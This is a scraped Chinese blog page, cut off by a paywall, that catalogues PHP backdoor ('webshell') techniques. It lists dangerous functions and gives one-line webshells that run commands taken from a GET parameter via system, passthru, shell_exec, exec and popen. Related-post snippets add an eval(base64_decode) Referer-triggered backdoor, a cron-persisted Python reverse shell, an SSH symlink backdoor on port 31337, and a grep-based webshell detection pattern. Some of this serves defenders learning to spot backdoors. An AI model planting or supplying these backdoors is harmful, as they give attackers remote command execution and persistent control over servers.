php域名追踪后门_常用php后门网马总结分析

最新推荐文章于 2021-06-02 13:32:27 发布
最新推荐文章于 2021-06-02 13:32:27 发布
阅读量318 收藏
点赞数
文章标签: php域名追踪后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34611130/article/details/115090766
版权

php后门木马对大家来说一点都不陌生吧,但是它的种类您又知多少呢?

php后门木马常用的函数大致上可分为四种类型:

1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open

2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

4. .htaccess: SetHandler, auto_prepend_file, auto_append_file

1. 执行系统命令:

system 函数

//test.php?cmd=ls

system($_GET[cmd]);

passthru 函数

//test.php?cmd=ls

passthru($_GET[cmd]);

shell_exec 函数

//test.php?cmd=ls

echo shell_exec($_GET[cmd]);

exec 函数

//test.php?cmd=ls

$arr = array();

exec($_GET[cmd],$arr);

print_r($arr);

popen 函数

//test.php?cmd=ls

$handle = popen(‘$_GET[cmd], ‘r’);

<
最低0.47元/天 解锁文章
白姬沙
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cmd后门cmd后门
01-03
放大镜建用户 放大镜建用户 放大镜建用户
PHP后门新玩法:一款猥琐的PHP后门分析
01-30
近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的...
php域名追踪后门_一些 PHP 管理系统程序中的后门
weixin_33989001的博客
03-08 132
我倒不怎么关心提示框,SABLOG怎么知道我的版本有漏洞呢,程序肯定有后门.每次登陆后台自动检测官方版本跟当前版本对比.嗯.后来找到了.在templates/admin/main.php最后的一部分.删掉如下代码就OK了.其实这个不足以导致被黑的,现在一般有点常识的,密码都比较复杂,几个数字+几个字母,MD5的话一般很难跑出来.当然有彩虹表的话,另说...i=1;var autourl=new A...
php域名追踪后门_一些常见的PHP后门原理分析
weixin_33274728的博客
03-08 159
本地测试结果如下图。本程序只作为学习作用,请勿拿去做坏事。复制代码代码如下://1.phpheader('Content-type:text/html;charset=utf-8');parse_str($_SERVER['HTTP_REFERER'], $a);if(reset($a) == '10' && count($a) == 9) {eval(base64_decode(...
一条命令实现命令行反弹后门
weixin_34149796的博客
02-04 289
TCP反弹后门//python版本,kali下面测试成功,tcp8080: (crontab-l;printf"*/5****/usr/bin/python-c'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.1...
后门
蓝法典的专栏
02-28 1115
Mix老装一幅正人君子的样子,说写文档,哼哼。。。。无聊,cmd /?后看见好多东西,其中有个好玩的: ******************* 如果 /D 未在命令行上被指定,当 CMD.EXE 开始时,它会寻找 以下 REG_SZ/REG_EXPAND_SZ 注册表变量。如果其中一个或 两个都存在,这两个变量会先被执行。 HKEY_LOCAL_MACHINE/Software/Microsoft
实战分析PHP大马隐藏后门(案例一)的-PHP大马
07-07
实战分析PHP大马隐藏后门(案例一)的-PHP大马
实战分析PHP大马隐藏后门——(案例二)的PHP大马
07-07
实战分析PHP大马隐藏后门——(案例二)的PHP大马
3个php后门WebShell木马扫描神器
10-09
3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
php后门木马常用命令.pdf
10-10
PHP后门木马常用命令 PHP后门木马常用的函数可以分为四种类型:执行系统命令、代码执行与加密、文件包含与生成、.htaccess。 执行系统命令 * system 函数:可以执行系统命令,例如`system($_GET['cmd']);` * ...
服务器后门(cmd使用)
03-24
服务器后门
cmd后门
smwhotjay的专栏
01-14 1006
// door.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include #include "stdafx.h" #include #pragma comment(lib,"Ws2_32") void door(); int main(int argc, char* argv[]) { door(); return 0; }
栈溢出攻击2——绕过Canary通过后门函数拿到shell
学习记录
09-16 2171
博文中的程序:点击下载 提取码:qbdd   能看到这篇博客,我相信大家对栈溢出攻击已经有了一定的了解。一个入门级的题目就是程序中本身有后门函数,我们用后门函数的入口地址覆盖当前正在执行函数的返回地址,这样当前函数执行结束之后,就会跳到后门函数执行,从而达到攻击的目的。那么我们有没有办法防范这种攻击呢?答案是有的,我们可以不使用像read、scanf等有缓冲区溢出漏洞的函数,当然,如果无法避免这些函数的使用,我们还可以使用canary机制来保护我们的程序。canary的英文名称是金丝雀,它可以用来判断我们
栈溢出攻击0——利用后门函数拿到shell权限
学习记录
09-12 1293
博文中所用程序:点我下载 提取码:v8qi   在IDA中经过反编译之后可以看到,这个题中seeme函数的功能就是拿到shell,因此不需要再去手动注入shellcode,只需将sayhi函数的返回地址覆盖成seeme函数的入口地址即可。 int seeme() { return system("/bin/sh"); }   在IDA中可以很容易的得到seeme函数的入口地址为0x080485B3,如下图所示。   下面考虑如何覆盖sayhi函数的返回地址。在IDA中,查看sayhi函数的伪代码。
Linux系统下查找webshell后门的强大命令
androidstar_cn的博客
10-31 5569
一句话查找PHP木马 # find ./ -name “*.php” |xargs egrep “phpspy|c99sh|milw0rm|eval(gunerpress|eval(base64_decoolcode|spider_bc))” > /tmp/php.txt # grep -r –include=*.php  ‘[^a-z]eval($_POST’ . > /tmp/ev
php变量函数后门,PHP函数usort是咋回事?还能当后门?
weixin_42299873的博客
03-12 222
开始原谅我见识短,没用过usort函数上面连接的文章中,发现有这个函数于是刚刚了解了下usort函数usort函数干嘛的?通俗点说就是一个稍微复杂点的数组,如果用php自带的函数不是很方便所以用户可以自己定义一个函数,然后使用usort函数来进行回调function my_sort($a,$b){if ($a==$b){return 0;}else{return ($a}}$list = arra...
php可以用cmd运行,用cmd运行php代码
weixin_32924297的博客
03-19 2734
用cmd运行php代码,首先要对电脑进行配置:1.右击计算机-属性-高级系统设置-环境变量,我们需要添加环境变量。2.在Administrator的用户变量(U)下点击新建,弹出对话框,变量名(N)写:PHP_HOME,变量值(V)为你的php程序的安装路径,例如我的是:D:\wamp\bin\php\php5.5.12\php.exe,写好之后点击确定。3.在系统变量(S)下找到Path,点击编...
LINUX留后门--教程(二)—— SSH软链接后门
W小哥
06-02 4749
一、本教程作用 1、用在攻击的途径上 2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急? 不知攻,焉知防 二、添加SSH后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限 环境: 一台开启ssh的任意Linux服务器就可以(我用的虚拟机) ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337 ...
cmd 命令行 执行php文件
Q斗士
11-18 2728
**首先添加环境变量 路径 :D:\php7.2 D:\php-7.2&amp;gt;php a.php
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值